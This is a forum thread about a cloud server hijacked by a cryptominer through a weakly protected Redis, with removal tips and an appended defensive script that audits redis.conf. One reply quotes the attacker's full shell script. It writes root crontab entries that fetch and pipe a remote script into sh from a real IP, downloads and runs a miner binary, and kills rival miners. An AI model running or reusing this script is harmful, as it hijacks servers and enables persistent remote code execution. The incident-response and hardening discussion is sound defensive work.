Recently I suddenly noticed abnormal CPU usage on an Ali CVM, together with a large number of login failures in a short period of time. Does anyone know what this is?
top
/tmp/qW3xT
crontab -l to check the scheduled tasks.
If there is one, kill it, then look at where the script file is located and delete it.
I have run into this: disable the scheduled task, change the Redis password, and restart it. It should be mining.
Thank you both. It is indeed a mining script, and it had set up a scheduled task. I was inexperienced.
It is most likely that the Redis password was too weak and got picked up by a scan. Please configure Redis so that it does not use a simple password. The script it executes is the following, for reference:
export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbin
# Persistence: overwrite root's crontab in both common spool locations (the first echo
# truncates the file, so any existing root jobs are lost) so that this script is
# re-fetched and re-run every five minutes; curl and wget are both used in case one is missing.
echo "*/5 * * * * curl -fsSL http://165.225.157.157:8000/i.sh | sh" > /var/spool/cron/root
echo "*/5 * * * * wget -q -O- http://165.225.157.157:8000/i.sh | sh" >> /var/spool/cron/root
mkdir -p /var/spool/cron/crontabs
echo "*/5 * * * * curl -fsSL http://165.225.157.157:8000/i.sh | sh" > /var/spool/cron/crontabs/root
echo "*/5 * * * * wget -q -O- http://165.225.157.157:8000/i.sh | sh" >> /var/spool/cron/crontabs/root
# Payload: if the dropper is not running, delete any stale copy, download the build
# matching this machine's CPU architecture, and start it. Deleting the binary without
# removing the cron entries therefore only buys five minutes.
ps auxf | grep -v grep | grep /tmp/ddgs.3011 || rm -rf /tmp/ddgs.3011
if [ ! -f "/tmp/ddgs.3011" ]; then
curl -fsSL http://165.225.157.157:8000/static/3011/ddgs.$(uname -m) -o /tmp/ddgs.3011
fi
chmod +x /tmp/ddgs.3011 && /tmp/ddgs.3011
# Kill competing miners, identified by process name, mining-pool hostname or install path,
# so that this one gets the whole CPU.
ps auxf | grep -v grep | grep Circle_MI | awk '{print $2}' | xargs kill
ps auxf | grep -v grep | grep get.bi-chi.com | awk '{print $2}' | xargs kill
ps auxf | grep -v grep | grep hashvault.pro | awk '{print $2}' | xargs kill
ps auxf | grep -v grep | grep nanopool.org | awk '{print $2}' | xargs kill
ps auxf | grep -v grep | grep minexmr.com | awk '{print $2}' | xargs kill
ps auxf | grep -v grep | grep /boot/efi/ | awk '{print $2}' | xargs kill
I also found that after Redis was in use, an IP tries to log in to the server every few minutes, and it is still going on now.
My server was also taken over by this mining program today. CPU at 99%.
Don't you know that it is best not to expose Redis at all? Even if you have to open it, don't open it on the default port.
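The advice in the last few replies (no simple password, don't expose Redis, don't use the default port) maps onto four lines of redis.conf. The audit below reads a config and reports each weak setting, shown against a constructed weak config and a constructed hardened one. This is an added example, not code from the thread; the password value is a placeholder.

```shell
#!/bin/sh
# Audit a redis.conf for the exposure that let this miner in: reachable on the
# default port from any interface, protected mode off, no password.
# Added example, not from the thread; both configs below are constructed.

# Constructed config with the weak settings the thread warns about.
WEAK_CONF='bind 0.0.0.0
protected-mode no
port 6379
daemonize yes'

# Constructed hardened config: loopback plus a private address, non-default port,
# long random password (placeholder value), protected mode left on.
HARDENED_CONF='bind 127.0.0.1 10.0.0.5
protected-mode yes
port 16379
requirepass 4f0a9c2e7b1d8e6f3a5c2b9d7e1f0a8c
daemonize yes'

# Read a redis.conf from stdin and print one finding per weak setting.
# Usage: redis_conf_findings < /etc/redis/redis.conf
redis_conf_findings() {
    awk '
        /^[[:space:]]*#/ || /^[[:space:]]*$/ { next }   # skip comments and blank lines
        $1 == "bind"           { bind = $2 }           # first address is enough to judge
        $1 == "protected-mode" { pm = $2 }
        $1 == "requirepass"    { pass = $2 }
        $1 == "port"           { port = $2 }
        END {
            if (bind == "" || bind == "0.0.0.0" || bind == "*")
                print "bind: listening on all interfaces; bind to 127.0.0.1 or a private address"
            if (pm == "no")
                print "protected-mode: explicitly disabled (Redis 3.2+ defaults to yes)"
            if (pass == "")
                print "requirepass: no password, anyone who can reach the port has full access"
            else if (length(pass) < 16)
                print "requirepass: password is short enough to guess from a scanner"
            if (port == "" || port == "6379")
                print "port: default 6379, the first thing mass scanners probe"
        }'
}

# Exit 0 when the config on stdin produces no findings, 1 otherwise.
redis_conf_ok() {
    [ "$(redis_conf_findings | wc -l | tr -d ' ')" -eq 0 ]
}

echo '== weak config =='
printf '%s\n' "$WEAK_CONF" | redis_conf_findings
echo '== hardened config (no output expected) =='
printf '%s\n' "$HARDENED_CONF" | redis_conf_findings
```

Changing the port only removes the server from the cheapest scans; the bind address and requirepass are what actually keep a scanner out, and on a cloud VM the security group should not allow the Redis port from the internet at all. After changing the password, restart Redis and re-run the crontab check, since an attacker who already had access may have left persistence behind.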